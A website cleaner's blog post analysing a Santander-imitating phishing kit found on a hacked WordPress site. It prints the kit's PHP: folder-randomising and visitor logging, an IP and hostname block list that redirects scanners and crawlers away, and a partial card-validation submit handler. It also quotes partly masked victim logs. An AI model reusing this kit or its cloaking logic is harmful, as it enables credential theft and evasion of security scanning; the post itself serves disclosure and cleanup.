Phishing content in my WordPress website

Hack Fraud Card Code Computer  - mohamed_hassan / Pixabay

This is another site from where I removed the malware. After getting the login details I inspected the files in the WordPress site and soon found the malicious content. Hacker was using the site to lure victims using a phishing technique.

One of the reasons hackers hack the website is to trick the user to input sensitive information through the victim website. They upload the files which when browsed look like a legit website such as PayPal. The victim then tries to login with their valid credentials. The entered login details will then be either stored in a text file and/or send to the hacker’s email. When the victim clicks the login, it will fail and redirects the victim to the legit site login page. You can read more about phishing site here: https://en.wikipedia.org/wiki/Phishing

Phishing is not limited to the website only. Hackers send the phishing email to you. You may find some in your spam folder. I highly recommend you to test your skills on finding the phishing email in the Kaspersky website here: https://www.kaspersky.com/blog/black-friday-scam-quiz/13485/

Back to my client website, the victims’ information was saved in a text file like below:

/---------------- VICTIM DETAILS ----------------/
IP address : 83.1xx.2xx.2xx
Country : Spain
OS : Android
Browser : Handheld Browser
--

/-- LOG INFOS --/90.1xx.1xx.20
Documento : NIF
NÂș de documento : 0507
Usuario : 
Password : 48907xxxx

How do they do it?

First of all they want to hide their content to be crawled by search engines like Google. For this they create a file called robots.txt with the following content:

User-agent: *
Disallow: /

The following is the content of index.php

<?php

include 'inc/app.php';
$get_user_ip          = get_user_ip();
$get_user_country     = get_user_country($get_user_ip);
$get_user_countrycode = get_user_countrycode($get_user_ip);
$get_user_os          = get_user_os();
$get_user_browser     = get_user_browser();

$random = rand(0,100000000000);
$DIR    = substr(md5($random), 0, 15);
$dispatch = substr(md5($random), 0, 17);
function recurse_copy($home,$DIR) {
    $dir = opendir($home);
    @mkdir($DIR);
    while(false !== ( $file = readdir($dir)) ) {
        if (( $file != '.' ) && ( $file != '..' )) {
            if ( is_dir($home . '/' . $file) ) {
                recurse_copy($home . '/' . $file,$DIR . '/' . $file);
            } else {
                copy($home . '/' . $file,$DIR . '/' . $file);
            }
        }
    }
    closedir($dir);
}

$home="z0n51";
recurse_copy( $home, $DIR );
header("location:$DIR/login.php?signin#_");
$file = fopen("vu.txt","a");
fwrite($file,$get_user_ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")." >> [$get_user_country | $get_user_os | $get_user_browser] \n");

?>

The folder z0n51 content all the files required for phishing. All the content inside this folder will be copied to randomly generate 15 character folder. The file vu.txt contains the user IP address, the date, country name, and the operating system of the victims. The sample is as follows:

4x.6x.6x.8x  -  2020-9-07 @ 21:44:12 >> [Spain | iPhone | Handheld Browser] 
1xx.x6.215.69  -  2020-9-07 @ 21:58:04 >> [Spain | Windows 10 | Chrome] 
9x.2xx.xx0.xx  -  2020-9-07 @ 22:06:33 >> [Spain | Android | Handheld Browser] 
x1.2xx.1xx.xx  -  2020-9-07 @ 22:08:03 >> [Spain | Android | Handheld Browser] 

The content of inc/app.php is as following

<?php
session_start();
error_reporting(0);
include_once 'functions.php';
include_once 'anti/anti1.php';
include_once 'anti/anti2.php';
include_once 'anti/anti3.php';
include_once 'anti/anti4.php';
include_once 'anti/anti5.php';
include_once 'anti/anti6.php';
include_once 'anti/anti7.php';
include_once 'anti/anti8.php';

Lets see what is inside anti/anti1.php

<?php $c28dd9c=$_SERVER['REMOTE_ADDR'];$c97e57ec=array("^66.102.*.*","^38.100.*.*","^107.170.*.*","^149.20.*.*","^38.105.*.*","^173.239.*.*","^173.244.36.*","^74.125.*.*","^66.150.14.*","^54.176.*.*","^38.100.*.*","^184.173.*.*","^66.249.*.*","^128.242.*.*","^72.14.192.*","^208.65.144.*","^74.125.*.*","^209.85.128.*","^216.239.32.*","^74.125.*.*","^207.126.144.*","^173.194.*.*","^64.233.160.*","^72.14.192.*","^66.102.*.*","^64.18.*.*","^194.52.68.*","^194.72.238.*","^62.116.207.*","^212.50.193.*","^69.65.*.*","^50.7.*.*","^131.212.*.*","^46.116.*.* ","^62.90.*.*","^89.138.*.*","^82.166.*.*","^85.64.*.*","^85.250.*.*","^89.138.*.*","^93.172.*.*","^109.186.*.*","^194.90.*.*","^212.29.192.*","^212.29.224.*","^212.143.*.*","^212.150.*.*","^212.235.*.*","^217.132.*.*","^50.97.*.*","^217.132.*.*","^209.85.*.*","^66.205.64.*","^204.14.48.*","^64.27.2.*","^67.15.*.*","^202.108.252.*","^193.47.80.*","^64.62.136.*","^66.221.*.*","^64.62.175.*","^198.54.*.*","^192.115.134.*","^216.252.167.*","^193.253.199.*","^69.61.12.*","^64.37.103.*","^38.144.36.*","^64.124.14.*","^206.28.72.*","^209.73.228.*","^158.108.*.*","^168.188.*.*","^66.207.120.*","^167.24.*.*","^192.118.48.*","^67.209.128.*","^12.148.209.*","^12.148.196.*","^193.220.178.*","68.65.53.71","^198.25.*.*","^64.106.213.*","173.239.240.147",
"103.248.172.42",
# skipped 
"103.248.172.42"
);if(in_array($c28dd9c,$c97e57ec)){exit(header('Location: https://www.bancosantander.es/es/aviso-legal'));}else{foreach($c97e57ec as $a4ade){if(preg_match('/'.$a4ade.'/',$c28dd9c)){header('Location: https://www.bancosantander.es/es/aviso-legal');echo("<h1>404 Not Found</h1>The page that you have requested could not be found.");}}}$e5bd3f5f=gethostbyaddr($c28dd9c);$f6650d6e=array("drweb","hostinger","scanurl","above","google","Dr.Web","facebook","softlayer","amazonaws","cyveillance","dreamhost","netpilot","calyxinstitute","tor-exit","phishtank","msnbot","p3pwgdsn","netcraft","trendmicro","ebay","paypal","torservers","messagelabs","sucuri.net","crawler");foreach($f6650d6e as $e540ca){if(substr_count($e5bd3f5f,$e540ca)>0){header('Location: https://www.bancosantander.es/es/aviso-legal');echo("<h1>404 Not Found</h1>The page that you have requested could not be found.");}}if(!empty($_SERVER['HTTP_USER_AGENT'])){$c3d1b=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");foreach($c3d1b as $cef6a){if(strpos($_SERVER['HTTP_USER_AGENT'],$cef6a)!==false){exit(header('Location: https://www.bancosantander.es/es/aviso-legal'));}}}?>

You may have guessed, hackers do not want to get detected by malware scanning websites and internet giant sites hence they block their IP addresses.

There is one other thing we want to know. Where these victim details go?? This is what we want to know. To know we have to check the submit.php file.

<?php

include_once '../inc/app.php';
include_once '../vendor/autoload.php';
use Inacho\CreditCard;

function validate_cc_number($number = null) {
    $card = CreditCard::validCreditCard($number);
    if( $card['valid'] == false ) {
        return false;
    }
    return $card;
}

function validate_cc_cvv($number = null,$type = null) {
    if( empty($number) || empty($type) )
        return false;
    $cvv = CreditCard::validCvc($number, $type);
    return $cvv;
}

$to = '[email protected]'; <-- This is the hacker email
# skipped
?>

So, the victims credentials are forwarded to zohomail.

2 comments

  1. Hi,

    Did you find out how the malicious files were uploaded to the server?

    We suffered the same attack and managed to disinfect but we wouldn’t like to see it happen again.

    Thank you in advance for your answer,

    Yours sincerely,

    1. Not really, the logs were limited because the client was hosting his website in shared server. But after changing the Cpanel password, those files never appeared. So it is likely that the cpanel password was compromised.

Leave a Reply

Your email address will not be published. Required fields are marked *